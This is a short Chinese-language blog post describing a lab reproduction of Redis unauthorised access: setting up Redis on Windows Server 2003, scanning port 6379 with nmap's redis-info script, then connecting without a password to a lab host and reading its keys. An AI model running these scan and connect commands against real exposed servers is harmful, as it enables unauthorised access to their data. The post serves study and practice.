Redis未授權訪問
阿新 • • 發佈:2018-05-15
總結 AR HR 簡單 mage col 根目錄 IT ros
最近在做校招題目的時候發現有問到未授權訪問,特此搭建了諸多未授權訪問的環境並且一一復現並做簡單總結。再此記錄下來
環境介紹
0x00環境搭建
我這裏用到的是Microsoft(R) Windows(R) Server 2003, Enterprise Edition 32位服務器,所以下載的是32位的redis,如果是64位的請下載對應的版本
下載地址:https://github.com/MSOpenTech/redis/releases。
下載下來的壓縮包將其放入C盤根目錄,重命名為Redis。打開一個 CMD 窗口,cd 進入到 C:\Redis,輸入 redis-server.exe Redis.conf
回車之後,如果顯示如下界面就證明成功了
看到這個界面之後,此時另起一個 CMD 窗口,同樣通過 cd 進入 C:\Redis 輸入 redis-cli.exe -h 127.0.0.1 -p 6379
之後設置key值 set key zxc
取出key值 get key
在這裏環境就已經搭建完成
0x01攻擊方法
1.使用nmap獲取目標端口信息
因為Redis默認端口號為6379,因此我們對6379端口進行掃描
1 nmap -A -p 6379 -script redis-info 192.168.50.130
這裏看到,已經獲取到了Redis的相關信息。
2.通過Redis未授權訪問獲取敏感信息
Redis在默認配置的情況下,是空口令,並且如果其默認端口6379對外開放的話,則可以遠程訪問,因此默認配置下的Redis我們可以直接連接並獲取敏感信息。
1 ./redis-cli -h 192.168.50.130 2 3 info
查看裏面對應的key值
keys *
get key
Redis未授權訪問